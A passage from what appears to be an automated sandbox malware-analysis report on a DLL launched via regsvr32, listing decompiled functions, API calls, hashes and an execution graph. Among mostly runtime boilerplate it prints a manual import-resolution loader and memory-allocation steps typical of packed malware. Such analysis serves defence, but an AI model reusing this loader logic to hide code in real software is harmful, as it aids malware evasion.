                                                                                                        				 *((intOrPtr*)( *_t28 + 0x60))();
                                                                                                        				E1000C6E6(_t23, _t28, 0, _t28, _t34);
                                                                                                        				if( *((intOrPtr*)(_t28 + 0x58)) != 0) {
                                                                                                        					FreeResource( *(_t29 - 0x18));
                                                                                                        				}
                                                                                                        				_t16 =  *((intOrPtr*)(_t28 + 0x44));
                                                                                                        				return E10017C60(_t16);
                                                                                                        			}








                                                                                                        0x1000ccd3
                                                                                                        0x1000ccd6
                                                                                                        0x1000ccde
                                                                                                        0x1000cce4
                                                                                                        0x1000cce4
                                                                                                        0x1000ccec
                                                                                                        0x1000ccf3
                                                                                                        0x1000ccf3
                                                                                                        0x1000ccfc
                                                                                                        0x1000ccfe
                                                                                                        0x1000cd04
                                                                                                        0x1000cd07
                                                                                                        0x1000cd0c
                                                                                                        0x1000cd0c
                                                                                                        0x1000cd07
                                                                                                        0x1000cd16
                                                                                                        0x1000cd1b
                                                                                                        0x1000cd23
                                                                                                        0x1000cd28
                                                                                                        0x1000cd28
                                                                                                        0x1000cd2e
                                                                                                        0x1000cd36

                                                                                                        APIs
                                                                                                        • EnableWindow.USER32(?,00000001), ref: 1000CCF3
                                                                                                        • GetActiveWindow.USER32 ref: 1000CCFE
                                                                                                        • SetActiveWindow.USER32(?,?,00000024,100014EC,00000000,E6B5FF6D), ref: 1000CD0C
                                                                                                        • FreeResource.KERNEL32(?,?,00000024,100014EC,00000000,E6B5FF6D), ref: 1000CD28
                                                                                                          • Part of subcall function 10012913: EnableWindow.USER32(?,E6B5FF6D), ref: 10012920
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$ActiveEnable$FreeResource
                                                                                                        • String ID:
                                                                                                        • API String ID: 253586258-0
                                                                                                        • Opcode ID: 5728dce3dbdb708f9e7fb54369dca357d78a73ff54a3e2536421aa2b19b7c5fa
                                                                                                        • Instruction ID: b9d50a594c6b72ab84edc47d27728691b22d7b2ae70339502ef362fb55dd66ce
                                                                                                        • Opcode Fuzzy Hash: 5728dce3dbdb708f9e7fb54369dca357d78a73ff54a3e2536421aa2b19b7c5fa
                                                                                                        • Instruction Fuzzy Hash: 97F04F3890071DDBEF12DB64C98599DBBF2FF48781B60002AE442722A5CB326D81DF51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 76%
                                                                                                        			E1000AD21(void* __ecx) {
                                                                                                        				signed int _v8;
                                                                                                        				char _v16;
                                                                                                        				char _v18;
                                                                                                        				char _v280;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t11;
                                                                                                        				long _t14;
                                                                                                        				intOrPtr _t15;
                                                                                                        				char* _t18;
                                                                                                        				intOrPtr _t21;
                                                                                                        				intOrPtr _t33;
                                                                                                        				signed int _t36;
                                                                                                        
                                                                                                        				_t11 =  *0x10057a08; // 0xe6b5ff6d
                                                                                                        				_v8 = _t11 ^ _t36;
                                                                                                        				_t35 = 0x104;
                                                                                                        				_t14 = GetModuleFileNameA( *(__ecx + 0x44),  &_v280, 0x104);
                                                                                                        				if(_t14 == 0 || _t14 == 0x104) {
                                                                                                        					L4:
                                                                                                        					_t15 = 0;
                                                                                                        					__eflags = 0;
                                                                                                        				} else {
                                                                                                        					_t18 = PathFindExtensionA( &_v280);
                                                                                                        					_t35 = "%s.dll";
                                                                                                        					asm("movsd");
                                                                                                        					asm("movsw");
                                                                                                        					_t32 =  &_v280;
                                                                                                        					_t41 = _t18 -  &_v280 + 7 - 0x106;
                                                                                                        					asm("movsb");
                                                                                                        					_t33 = _t33;
                                                                                                        					if(_t18 -  &_v280 + 7 > 0x106) {
                                                                                                        						goto L4;
                                                                                                        					} else {
                                                                                                        						E1000A7B3(_t21,  &_v280, _t33, "%s.dll", _t36, _t18,  &_v18 - _t18,  &_v16);
                                                                                                        						_t15 = E1000AA3A(_t21,  &_v280, _t33, "%s.dll", _t41,  &_v280);
                                                                                                        					}
                                                                                                        				}
                                                                                                        				return E100167D5(_t15, _t21, _v8 ^ _t36, _t32, _t33, _t35);
                                                                                                        			}

















                                                                                                        0x1000ad2a
                                                                                                        0x1000ad31
                                                                                                        0x1000ad37
                                                                                                        0x1000ad47
                                                                                                        0x1000ad4f
                                                                                                        0x1000ada6
                                                                                                        0x1000ada6
                                                                                                        0x1000ada6
                                                                                                        0x1000ad55
                                                                                                        0x1000ad5d
                                                                                                        0x1000ad63
                                                                                                        0x1000ad6b
                                                                                                        0x1000ad6c
                                                                                                        0x1000ad70
                                                                                                        0x1000ad7b
                                                                                                        0x1000ad81
                                                                                                        0x1000ad82
                                                                                                        0x1000ad83
                                                                                                        0x00000000
                                                                                                        0x1000ad85
                                                                                                        0x1000ad90
                                                                                                        0x1000ad9f
                                                                                                        0x1000ad9f
                                                                                                        0x1000ad83
                                                                                                        0x1000adb4

                                                                                                        APIs
                                                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 1000AD47
                                                                                                        • PathFindExtensionA.SHLWAPI(?), ref: 1000AD5D
                                                                                                          • Part of subcall function 1000A7B3: _strcpy_s.LIBCMT ref: 1000A7BF
                                                                                                          • Part of subcall function 1000AA3A: __EH_prolog3.LIBCMT ref: 1000AA59
                                                                                                          • Part of subcall function 1000AA3A: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 1000AA7A
                                                                                                          • Part of subcall function 1000AA3A: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 1000AA8B
                                                                                                          • Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC1
                                                                                                          • Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC9
                                                                                                          • Part of subcall function 1000AA3A: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 1000AADD
                                                                                                          • Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(?), ref: 1000AB01
                                                                                                          • Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(000003FF), ref: 1000AB07
                                                                                                          • Part of subcall function 1000AA3A: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 1000AB40
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
                                                                                                        • String ID: %s.dll
                                                                                                        • API String ID: 3444012488-3668843792
                                                                                                        • Opcode ID: 6c30b6a237bf11204af5acb5ac5b7830e50b8e52d34c93bd03a652aa76484c2b
                                                                                                        • Instruction ID: a3b0371864cf8cb86b39257a88ab5a21b33b2e0076ae9bf6281b2400efea00f1
                                                                                                        • Opcode Fuzzy Hash: 6c30b6a237bf11204af5acb5ac5b7830e50b8e52d34c93bd03a652aa76484c2b
                                                                                                        • Instruction Fuzzy Hash: AD01F972A00018AFEF08DB74CD45DEE73B8DF46740F4102AAE906D3544EA70AB848662
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10002670(intOrPtr __ecx, intOrPtr* _a4) {
                                                                                                        				void* _v8;
                                                                                                        				intOrPtr* _v12;
                                                                                                        				intOrPtr _v16;
                                                                                                        				intOrPtr _v20;
                                                                                                        				intOrPtr* _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				signed int* _v32;
                                                                                                        				intOrPtr _v36;
                                                                                                        				intOrPtr _v40;
                                                                                                        				intOrPtr _v44;
                                                                                                        				intOrPtr _t114;
                                                                                                        				intOrPtr _t116;
                                                                                                        				intOrPtr _t133;
                                                                                                        				intOrPtr _t138;
                                                                                                        				void* _t202;
                                                                                                        				void* _t203;
                                                                                                        
                                                                                                        				_v44 = __ecx;
                                                                                                        				_v20 =  *((intOrPtr*)(_a4 + 4));
                                                                                                        				_v16 = 1;
                                                                                                        				_v12 =  *_a4 + 0x80;
                                                                                                        				if( *((intOrPtr*)(_v12 + 4)) != 0) {
                                                                                                        					_v8 = _v20 +  *_v12;
                                                                                                        					while(IsBadReadPtr(_v8, 0x14) == 0 &&  *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                                                                                        						_t114 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x1c))))(_v20 +  *((intOrPtr*)(_v8 + 0xc)),  *((intOrPtr*)(_a4 + 0x28)));
                                                                                                        						_t203 = _t202 + 8;
                                                                                                        						_v36 = _t114;
                                                                                                        						if(_v36 != 0) {
                                                                                                        							_t116 = E10001F00( *((intOrPtr*)(_a4 + 8)), 4 +  *(_a4 + 0xc) * 4);
                                                                                                        							_t202 = _t203 + 8;
                                                                                                        							_v28 = _t116;
                                                                                                        							if(_v28 != 0) {
                                                                                                        								 *((intOrPtr*)(_a4 + 8)) = _v28;
                                                                                                        								 *((intOrPtr*)( *((intOrPtr*)(_a4 + 8)) +  *(_a4 + 0xc) * 4)) = _v36;
                                                                                                        								 *(_a4 + 0xc) =  *(_a4 + 0xc) + 1;
                                                                                                        								if( *_v8 == 0) {
                                                                                                        									_v32 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
                                                                                                        									_v24 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
                                                                                                        								} else {
                                                                                                        									_v32 = _v20 +  *_v8;
                                                                                                        									_v24 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
                                                                                                        								}
                                                                                                        								while( *_v32 != 0) {
                                                                                                        									if(( *_v32 & 0x80000000) == 0) {
                                                                                                        										_v40 = _v20 +  *_v32;
                                                                                                        										_t133 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x20))))(_v36, _v40 + 2,  *((intOrPtr*)(_a4 + 0x28)));
                                                                                                        										_t202 = _t202 + 0xc;
                                                                                                        										 *_v24 = _t133;
                                                                                                        									} else {
                                                                                                        										_t138 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x20))))(_v36,  *_v32 & 0x0000ffff,  *((intOrPtr*)(_a4 + 0x28)));
                                                                                                        										_t202 = _t202 + 0xc;
                                                                                                        										 *_v24 = _t138;
                                                                                                        									}
                                                                                                        									if( *_v24 != 0) {
                                                                                                        										_v32 =  &(_v32[1]);
                                                                                                        										_v24 = _v24 + 4;
                                                                                                        										continue;
                                                                                                        									} else {
                                                                                                        										_v16 = 0;
                                                                                                        										break;
                                                                                                        									}
                                                                                                        								}
                                                                                                        								if(_v16 != 0) {
                                                                                                        									_v8 = _v8 + 0x14;
                                                                                                        									continue;
                                                                                                        								}
                                                                                                        								 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x24))))(_v36,  *((intOrPtr*)(_a4 + 0x28)));
                                                                                                        								SetLastError(0x7f);
                                                                                                        								break;
                                                                                                        							}
                                                                                                        							 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x24))))(_v36,  *((intOrPtr*)(_a4 + 0x28)));
                                                                                                        							SetLastError(0xe);
                                                                                                        							_v16 = 0;
                                                                                                        							break;
                                                                                                        						}
                                                                                                        						SetLastError(0x7e);
                                                                                                        						_v16 = 0;
                                                                                                        						break;
                                                                                                        					}
                                                                                                        					return _v16;
                                                                                                        				}
                                                                                                        				return 1;
                                                                                                        			}



















                                                                                                        0x10002676
                                                                                                        0x1000267f
                                                                                                        0x10002682
                                                                                                        0x10002693
                                                                                                        0x1000269d
                                                                                                        0x100026b1
                                                                                                        0x100026bf
                                                                                                        0x100026f7
                                                                                                        0x100026f9
                                                                                                        0x100026fc
                                                                                                        0x10002703
                                                                                                        0x1000272e
                                                                                                        0x10002733
                                                                                                        0x10002736
                                                                                                        0x1000273d
                                                                                                        0x1000276f
                                                                                                        0x10002781
                                                                                                        0x10002790
                                                                                                        0x10002799
                                                                                                        0x100027bd
                                                                                                        0x100027c9
                                                                                                        0x1000279b
                                                                                                        0x100027a3
                                                                                                        0x100027af
                                                                                                        0x100027af
                                                                                                        0x100027e0
                                                                                                        0x100027f3
                                                                                                        0x10002825
                                                                                                        0x10002840
                                                                                                        0x10002842
                                                                                                        0x10002848
                                                                                                        0x100027f5
                                                                                                        0x10002811
                                                                                                        0x10002813
                                                                                                        0x10002819
                                                                                                        0x10002819
                                                                                                        0x10002850
                                                                                                        0x100027d4
                                                                                                        0x100027dd
                                                                                                        0x00000000
                                                                                                        0x10002852
                                                                                                        0x10002852
                                                                                                        0x00000000
                                                                                                        0x10002852
                                                                                                        0x10002850
                                                                                                        0x10002864
                                                                                                        0x100026bc
                                                                                                        0x00000000
                                                                                                        0x100026bc
                                                                                                        0x10002877
                                                                                                        0x1000287e
                                                                                                        0x00000000
                                                                                                        0x1000287e
                                                                                                        0x10002750
                                                                                                        0x10002757
                                                                                                        0x1000275d
                                                                                                        0x00000000
                                                                                                        0x1000275d
                                                                                                        0x10002707
                                                                                                        0x1000270d
                                                                                                        0x00000000
                                                                                                        0x1000270d
                                                                                                        0x00000000
                                                                                                        0x1000288b
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,10002C4E,00000000,00000000), ref: 100026C5
                                                                                                        • SetLastError.KERNEL32(0000007E), ref: 10002707
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLastRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 4100373531-0
                                                                                                        • Opcode ID: c2a98b38cbef77d555c79c56aa9516de66013d98deec03bde9f9d281594a25e0
                                                                                                        • Instruction ID: 5b18a635dcf056017fd1ee77a603d3a0bb8baed770e763f1765233b10108ec1d
                                                                                                        • Opcode Fuzzy Hash: c2a98b38cbef77d555c79c56aa9516de66013d98deec03bde9f9d281594a25e0
                                                                                                        • Instruction Fuzzy Hash: 7381BAB4A05209DFDB04CF94C880A9EB7B1FF88354F248159E819AB355D735EE82CF94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 82%
                                                                                                        			E1001431B(void* __ebx, void* __esi, void* __ebp, signed int _a4) {
                                                                                                        				void* __edi;
                                                                                                        				struct _CRITICAL_SECTION* _t4;
                                                                                                        				void* _t7;
                                                                                                        				void* _t10;
                                                                                                        				signed int _t11;
                                                                                                        				void* _t14;
                                                                                                        				intOrPtr* _t15;
                                                                                                        				void* _t17;
                                                                                                        
                                                                                                        				_t17 = __ebp;
                                                                                                        				_t14 = __esi;
                                                                                                        				_t7 = __ebx;
                                                                                                        				_t11 = _a4;
                                                                                                        				_t20 = _t11 - 0x11;
                                                                                                        				if(_t11 >= 0x11) {
                                                                                                        					_t4 = E1000A0DB(__ebx, _t10, _t11, __esi, _t20);
                                                                                                        				}
                                                                                                        				if( *0x1005aac0 == 0) {
                                                                                                        					_t4 = E100142F7();
                                                                                                        				}
                                                                                                        				_push(_t7);
                                                                                                        				_push(_t17);
                                                                                                        				_push(_t14);
                                                                                                        				_t15 = 0x1005ac78 + _t11 * 4;
                                                                                                        				if( *_t15 == 0) {
                                                                                                        					EnterCriticalSection(0x1005ac60);
                                                                                                        					if( *_t15 == 0) {
                                                                                                        						_t4 = 0x1005aac8 + _t11 * 0x18;
                                                                                                        						InitializeCriticalSection(_t4);
                                                                                                        						 *_t15 =  *_t15 + 1;
                                                                                                        					}
                                                                                                        					LeaveCriticalSection(0x1005ac60);
                                                                                                        				}
                                                                                                        				EnterCriticalSection(0x1005aac8 + _t11 * 0x18);
                                                                                                        				return _t4;
                                                                                                        			}











                                                                                                        0x1001431b
                                                                                                        0x1001431b
                                                                                                        0x1001431b
                                                                                                        0x1001431c
                                                                                                        0x10014320
                                                                                                        0x10014323
                                                                                                        0x10014325
                                                                                                        0x10014325
                                                                                                        0x10014331
                                                                                                        0x10014333
                                                                                                        0x10014333
                                                                                                        0x10014338
                                                                                                        0x1001433f
                                                                                                        0x10014340
                                                                                                        0x10014341
                                                                                                        0x10014350
                                                                                                        0x10014357
                                                                                                        0x1001435c
                                                                                                        0x10014363
                                                                                                        0x10014366
                                                                                                        0x1001436c
                                                                                                        0x1001436c
                                                                                                        0x10014373
                                                                                                        0x10014373
                                                                                                        0x1001437f
                                                                                                        0x10014385

                                                                                                        APIs
                                                                                                        • EnterCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014357
                                                                                                        • InitializeCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014366
                                                                                                        • LeaveCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014373
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 1001437F
                                                                                                          • Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
                                                                                                          • Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
                                                                                                        • String ID:
                                                                                                        • API String ID: 2895727460-0
                                                                                                        • Opcode ID: fc52205701aaf5afb0ce0b222181c69e48b6197276059f190c1bff8ca6cb0e4a
                                                                                                        • Instruction ID: b2ae72b8ab0fae698251e24a42d2174316ff56aad592cf34d272a36c1b8e20b9
                                                                                                        • Opcode Fuzzy Hash: fc52205701aaf5afb0ce0b222181c69e48b6197276059f190c1bff8ca6cb0e4a
                                                                                                        • Instruction Fuzzy Hash: 05F090739002169BE700DF59CC89A1ABBA9FBC32A5F93011AF14096121DB3199C5CA61
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E1001398E(long* __ecx, signed int _a4) {
                                                                                                        				void* _t9;
                                                                                                        				struct _CRITICAL_SECTION* _t12;
                                                                                                        				signed int _t14;
                                                                                                        				long* _t16;
                                                                                                        
                                                                                                        				_t16 = __ecx;
                                                                                                        				_t1 =  &(_t16[7]); // 0x1005aaa8
                                                                                                        				_t12 = _t1;
                                                                                                        				EnterCriticalSection(_t12);
                                                                                                        				_t14 = _a4;
                                                                                                        				if(_t14 <= 0) {
                                                                                                        					L5:
                                                                                                        					LeaveCriticalSection(_t12);
                                                                                                        					return 0;
                                                                                                        				}
                                                                                                        				_t3 =  &(_t16[3]); // 0x3
                                                                                                        				if(_t14 >=  *_t3) {
                                                                                                        					goto L5;
                                                                                                        				}
                                                                                                        				_t9 = TlsGetValue( *_t16);
                                                                                                        				if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
                                                                                                        					goto L5;
                                                                                                        				} else {
                                                                                                        					LeaveCriticalSection(_t12);
                                                                                                        					return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
                                                                                                        				}
                                                                                                        			}







                                                                                                        0x10013990
                                                                                                        0x10013993
                                                                                                        0x10013993
                                                                                                        0x10013997
                                                                                                        0x1001399d
                                                                                                        0x100139a3
                                                                                                        0x100139cc
                                                                                                        0x100139cd
                                                                                                        0x00000000
                                                                                                        0x100139d3
                                                                                                        0x100139a5
                                                                                                        0x100139a8
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100139ac
                                                                                                        0x100139b4
                                                                                                        0x00000000
                                                                                                        0x100139bb
                                                                                                        0x100139c2
                                                                                                        0x00000000
                                                                                                        0x100139c8

                                                                                                        APIs
                                                                                                        • EnterCriticalSection.KERNEL32(1005AAA8,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 10013997
                                                                                                        • TlsGetValue.KERNEL32(1005AA8C,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 100139AC
                                                                                                        • LeaveCriticalSection.KERNEL32(1005AAA8,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 100139C2
                                                                                                        • LeaveCriticalSection.KERNEL32(1005AAA8,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 100139CD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$Leave$EnterValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 3969253408-0
                                                                                                        • Opcode ID: 8c266227b3abe2b759591ba9b775a43eab1fad3fbd471f069813da335311fd75
                                                                                                        • Instruction ID: ae8276b6876f5357c50f650584214137971e28de593e3cdb7c29343fae997712
                                                                                                        • Opcode Fuzzy Hash: 8c266227b3abe2b759591ba9b775a43eab1fad3fbd471f069813da335311fd75
                                                                                                        • Instruction Fuzzy Hash: 27F012762006529FD710DF65CC8C90B77EDEF84291327D856E84697152D770F856CF50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:5.7%
                                                                                                        Dynamic/Decrypted Code Coverage:13.3%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:353
                                                                                                        Total number of Limit Nodes:25

                                                                                                        Graph

                                                                                                        execution_graph 20499 10017b85 20500 10017b91 20499->20500 20501 10017b8c 20499->20501 20505 10017a8f 20500->20505 20517 1001f914 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 20501->20517 20504 10017ba2 20506 10017a9b __mtinitlocknum 20505->20506 20510 10017ae8 20506->20510 20514 10017b38 __mtinitlocknum 20506->20514 20518 100178b6 20506->20518 20510->20514 20573 100088e0 20510->20573 20511 10017b18 20512 100178b6 __CRT_INIT@12 162 API calls 20511->20512 20511->20514 20512->20514 20513 100088e0 ___DllMainCRTStartup 142 API calls 20515 10017b0f 20513->20515 20514->20504 20516 100178b6 __CRT_INIT@12 162 API calls 20515->20516 20516->20511 20517->20500 20519 100179e0 20518->20519 20520 100178c9 GetProcessHeap HeapAlloc 20518->20520 20522 100179e6 20519->20522 20523 10017a1b 20519->20523 20521 100178ed GetVersionExA 20520->20521 20536 100178e6 20520->20536 20524 10017908 GetProcessHeap HeapFree 20521->20524 20525 100178fd GetProcessHeap HeapFree 20521->20525 20530 10017a05 20522->20530 20522->20536 20686 10018033 66 API calls _doexit 20522->20686 20526 10017a20 20523->20526 20527 10017a79 20523->20527 20528 10017934 20524->20528 20525->20536 20689 1001bddb 6 API calls __decode_pointer 20526->20689 20527->20536 20711 1001c0b2 78 API calls 2 library calls 20527->20711 20593 1001a305 HeapCreate 20528->20593 20530->20536 20687 1001f295 67 API calls __mtinitlocknum 20530->20687 20531 10017a25 20690 1001e76e 20531->20690 20536->20510 20537 1001796a 20537->20536 20603 1001c11b GetModuleHandleA 20537->20603 20540 10017a0f 20688 1001be05 5 API calls __decode_pointer 20540->20688 20541 10017a3d 20696 1001bd6f TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress 20541->20696 20546 10017978 __RTC_Initialize 20549 1001797c 20546->20549 20551 1001798b GetCommandLineA 20546->20551 20548 10017a4f 20553 10017a56 20548->20553 20554 10017a6d 20548->20554 20680 1001a35f VirtualFree HeapFree HeapFree HeapDestroy 20549->20680 20636 1001f60d 20551->20636 20697 1001be42 66 API calls 4 library calls 20553->20697 20698 10016380 20554->20698 20558 10017a5d GetCurrentThreadId 20558->20536 20560 100179a5 20561 100179b0 20560->20561 20562 100179a9 20560->20562 20682 1001f554 110 API calls 3 library calls 20561->20682 20681 1001be05 5 API calls __decode_pointer 20562->20681 20565 100179b5 20571 100179c9 20565->20571 20683 1001f2e1 109 API calls 6 library calls 20565->20683 20568 100179de 20568->20562 20569 100179be 20569->20571 20684 10017ec2 74 API calls 3 library calls 20569->20684 20572 100179ce 20571->20572 20685 1001f295 67 API calls __mtinitlocknum 20571->20685 20572->20536 20757 10008860 20573->20757 20576 10008966 20787 1001771b 104 API calls 7 library calls 20576->20787 20578 10008970 20578->20511 20578->20513 20579 10008932 ___DllMainCRTStartup 20580 10008a00 ___DllMainCRTStartup 20579->20580 20581 10008a36 ___DllMainCRTStartup 20579->20581 20582 10008a1a VirtualAllocExNuma 20580->20582 20583 10008a4e VirtualAlloc 20581->20583 20584 10008a66 20582->20584 20583->20584 20585 10016a10 _memcpy_s __VEC_memcpy 20584->20585 20586 10008a78 20585->20586 20762 1001703b 20586->20762 20588 10008a87 20781 10002fa0 20588->20781 20590 10008a9d ___DllMainCRTStartup 20784 10002d20 20590->20784 20594 1001a325 20593->20594 20595 1001a328 20593->20595 20594->20537 20712 1001a2aa 66 API calls 3 library calls 20595->20712 20597 1001a32d 20598 1001a337 20597->20598 20599 1001a35b 20597->20599 20713 1001a57a HeapAlloc 20598->20713 20599->20537 20601 1001a341 20601->20599 20602 1001a346 HeapDestroy 20601->20602 20602->20594 20604 1001c136 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 20603->20604 20605 1001c12d 20603->20605 20607 1001c180 TlsAlloc 20604->20607 20714 1001be05 5 API calls __decode_pointer 20605->20714 20610 1001c29a 20607->20610 20611 1001c1ce TlsSetValue 20607->20611 20610->20546 20611->20610 20612 1001c1df 20611->20612 20715 10018042 4 API calls 3 library calls 20612->20715 